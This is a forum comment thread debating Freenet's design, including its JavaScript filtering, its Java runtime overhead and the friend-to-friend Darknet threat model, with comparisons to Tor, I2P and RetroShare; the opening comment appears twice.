I'm a fan of Freenet, but it has some core (and extremely longstanding!) usability issues that Tor has proven are unforced errors.
The restrictions on JavaScript is the biggest one. The complete inability to run server-side code in a trusted context makes JS more necessary on Freenet than the HTTP web; it's absense makes developing a useful Freenet site extremely difficult. It causes interesting Freenet projects to be deployed as local applications (which necessitates auto-update to be practical). This represents an absolute trust of unknown service providers and is vastly worse than running untrusted JavaScript. It also makes maintaining parallel Freenet and HTTP sites impractical in practice (when only reader-side anonymity is needed), something Tor got right the first time.
Secondly, Freenet's JavaScript exclusion relies entirely on filtering code that's specific to Freenet and thus not anywhere near as battle-hardened as browser JS engines. You don't need a Chrome zero-day to circumvent Freenet's reader anonymity, you just need to find an edge case in its filtering code against the moving target of a self-updating browser.
Freenet's core feature of anonymous distributed hosting (as opposed to just Tor's distributed proxying and Bittorrent's bandwidth sharing) is still a relevant technological frontier that's long overdue to see the light of day, but that's not going to happen until it stops tilting at windmills on some of the crazier technical decisions.
Edit: While I'm complaining, I'm unclear on the real-world threat model that the friend-to-friend Darknet is supposed to protect against. Proving out that globally routable friend networks a la "The Crying of Lot 49" actually function is neat scientific accomplishment but it does nothing but help the Global Passive Attacker and probably makes things easier for more mundane threats too.
Agreed. Not the language itself, but the way the runtime operates. One simply does not build reliable and fundamental abstractions over non-optimal enough abstractions and expect things to work long-term.
All the abstractions you build will eventually go over x86 bytecode instructions. And those aren't pretty, let me tell you.
The truth is that there is nothing important wrong with Java, and everything important wrong with Java programmers, which casues people like you to say things like that.
I guess you aren't aware of the dozens of 0-day exploits to the JVM that were released last year? Since Oracle took over, Java's security model is looking like Swiss cheese, Oracle's responsiveness to security flaws has been slow, and the fixes have introduced even more security flaws.
The problems weren't with the Java Applet executor. They were with the JVM. Java WebStart and the JVM security model are the two places where most of the 0-day exploits came. Neither of these have anything to do with applets.
What are these magical "x86 bytecode instructions"? That phrasing itself means nothing. Are you sure you know what you are talking about?
I personally object by principle anything which is non-optimal by design because it means that everything built atop has to carry the penalties of the non-optimal design. Everyone suffers from the tradeoffs.
Currently running Freenet/Tor/I2P on a VM (KVM) with 1.5GB RAM allocated it. according to htop, java (Freenet and I2P) is using 985MB. Tor is using approximately 40MB.
The day someone takes up a rewrite of Freenet in C/C++ is the day I send money to the project.
I really like when I goto download some new app and see that there is a simple executable .jar I can get. They are still bloated and slow though.. just so happens that we have workstations with i7s and 32GB of RAM.
We finally caught up to where Java is reasonable, yay!
What do you mean when you say that Firefox is "a Java Internet browser"? Firefox wasn't written in Java. Java code only runs in Firefox through the use of the Java plugin, just like any other browser.
RetroShare isn't similar to Freenet at all. Please read design & white papers completely for both projects. What I really like about Freenet & GNUnet is the build in distributed efficient caching of data. So even small sites won't go down when there's a global rush.
Retroshare is currently the best example of Zawinski's Law[1] one could ask for; We needed a p2p/f2f daemon we could run voip/chat/messaging/file sharing on top of. Instead, we're given this bloated hunk of 1998's software design policies that tries to do everything for us, but do all of it poorly.
They are comparing static sites on Freenet with dynamic hidden services on Tor. Sure, hosting many hidden services with the same provider was dumb, but we're talking apples and oranges here.
The restrictions on JavaScript is the biggest one. The complete inability to run server-side code in a trusted context makes JS more necessary on Freenet than the HTTP web; it's absense makes developing a useful Freenet site extremely difficult. It causes interesting Freenet projects to be deployed as local applications (which necessitates auto-update to be practical). This represents an absolute trust of unknown service providers and is vastly worse than running untrusted JavaScript. It also makes maintaining parallel Freenet and HTTP sites impractical in practice (when only reader-side anonymity is needed), something Tor got right the first time.
Secondly, Freenet's JavaScript exclusion relies entirely on filtering code that's specific to Freenet and thus not anywhere near as battle-hardened as browser JS engines. You don't need a Chrome zero-day to circumvent Freenet's reader anonymity, you just need to find an edge case in its filtering code against the moving target of a self-updating browser.
Freenet's core feature of anonymous distributed hosting (as opposed to just Tor's distributed proxying and Bittorrent's bandwidth sharing) is still a relevant technological frontier that's long overdue to see the light of day, but that's not going to happen until it stops tilting at windmills on some of the crazier technical decisions.
Edit: While I'm complaining, I'm unclear on the real-world threat model that the friend-to-friend Darknet is supposed to protect against. Proving out that globally routable friend networks a la "The Crying of Lot 49" actually function is neat scientific accomplishment but it does nothing but help the Global Passive Attacker and probably makes things easier for more mundane threats too.